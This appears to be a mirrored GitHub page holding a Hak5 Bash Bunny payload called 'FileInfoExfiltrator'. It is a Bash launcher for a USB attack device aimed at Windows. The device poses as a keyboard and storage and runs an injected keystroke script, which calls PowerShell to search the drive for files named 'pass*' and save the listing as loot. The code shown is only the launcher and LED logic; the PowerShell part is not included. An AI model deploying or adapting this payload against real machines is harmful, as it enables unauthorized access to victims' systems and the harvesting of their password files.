mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
44 lines
1.1 KiB
Bash
44 lines
1.1 KiB
Bash
#!/bin/bash
|
|
|
|
# Title: FileInfoExfiltrator
|
|
# Author: A_SarcasticGuy
|
|
# Version: 1.0
|
|
# Attack Modes: HID, STORAGE
|
|
# Targets: Windows
|
|
# Description: Runs Powershell that calls a .ps1 file to scan (in all subdirectories of path provided)
|
|
# for all files (by default starting on c:/) beginning with a #specific phrase (default "pass*")
|
|
# to then be outputted to a text file in the loot directory, in a subfolder with the name of the
|
|
# system and with a file name of the date and time of the scan.
|
|
# NOTE: p.ps1 MUST be in loot/payloads/ for this to work.
|
|
#
|
|
# LEDS
|
|
# Magenta: Script Started
|
|
# Yellow: Ducky Script Started
|
|
# Red: Failed to run Ducky Script, see log file
|
|
#
|
|
#
|
|
|
|
LED SETUP
|
|
|
|
GET SWITCH_POSITION
|
|
|
|
ATTACKMODE HID STORAGE
|
|
|
|
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
|
|
|
|
#Call ducky script
|
|
LED STAGE1
|
|
|
|
QUACK ${SWITCH_POSITION}/ducky_script.txt
|
|
QUACK DELAY 10000
|
|
LED FINISH
|
|
|
|
else
|
|
|
|
LED FAIL
|
|
#Red LED if unable to load script
|
|
echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
|
|
|
|
exit 1
|
|
fi
|